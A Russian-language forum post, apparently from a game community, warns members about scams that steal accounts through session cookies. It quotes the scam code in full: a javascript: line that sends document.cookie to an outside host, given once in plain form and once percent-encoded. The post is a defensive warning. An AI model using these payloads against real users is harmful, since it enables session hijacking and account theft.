Еще один "новый" способ украсть у вас перса.
Понимаю что оформление темы ....., но все же рекомендую все прочитать.
Ну для начала вам в лч приходит сообщение, с любым текстом но будет ссылка. (пример, привет, посмотри если не трудно эту темку https://www.parapa.ru/forums/showthread.php?t=13680).
По сути не чего опасного, но это только на первый взгляд.
Для начала посмотрим что у нас с этой самой ссылкой "https://www.parapa.ru/forums/showthread.php?t=13680" на самом деле. Внизу страницы смотрим редирект ну или проще говоря куда нас перенаправляют. Если ссылка будет отличаться от того что нам прислали "https://www.parapa.ru/forums/showthread.php?t=13680" и внизу страницы(редирект внизу левый угол) будет ссылка с началом вида https://httpz то спокойно удаляем это письмо и даже не думаем переходить по нему(можно так же можно нажать "Пожаловаться на это сообщение").
В данном случаи "мошеннику" придут ваши кукисы, cookies, куки, печеньки в конце концов.
Cсылка может быть как с окончанием .jpg, .img, js, так и обыкновенная ссылка.
Далее если заменить куки на сайте то можно будет спокойно зайти под вашим аккаунтом и "накасячить" на форуме. Заранее предупреждаю, смотрите куда нас будет пересылать браузер в нижнем левом углу, если не хотите потерять свой аккаунт.
Ps: не думаю что сейчас на данном сайте кто нибудь этим промышляет, но на будущее что бы знали
Pss: данный "баг" есть на всех сайтах, так что советую так же смотреть куда нас будет пересылать браузер и на других сайтах помимо пара па.
Ну и решил рассказать еще про один "баг".
приходит к нам письмо вида:
"смотри как бесплатно можно накручивать мнт, введи такой код и получи мнт" пример может быть и с вещами, чеками, денсами, очками и всему что только в голову придет.
Сам же код будет вида:
javascript:document.write('<script>img = new Image(); img.src = "https://здесь ссылка.gif?"+document.cookie;</script>')
Вместо "здесь ссылка" присутствует другая ссылка, как бы глупо не звучало. :D
Вводим данный код в браузерную строку и у нас появляется какая нить "картинка" это так сказать что бы отвести подозрение, в данный момент "мошеннику" уходят ваши печеньки...
Так же к данному письму есть небольшая кодировка...
Сообщение с видом:
перейди по этой ссылке, точнее введи её в браузерную строку: %6A%61%76%61%73%63%72%69%70%74%3A%64%6F%63%75%6D%6 5%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70% 74%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65 %28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%7 4%74%70%3A%2F%2F%68%74%74%70%7A%2E%72%75%2F%6E%71% 32%76%31%79%72%70%36%34%74%2E%67%69%66%3F%22%2B%64 %6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2 F%73%63%72%69%70%74%3E%27%29 сразу же удаляйте, у данной ссылки принцип действия такой же как и у js "javascript:document.write('<script>img = new Image(); img.src = "https://здесь ссылка.gif?"+document.cookie;</script>')"
Сообщение от tyasik
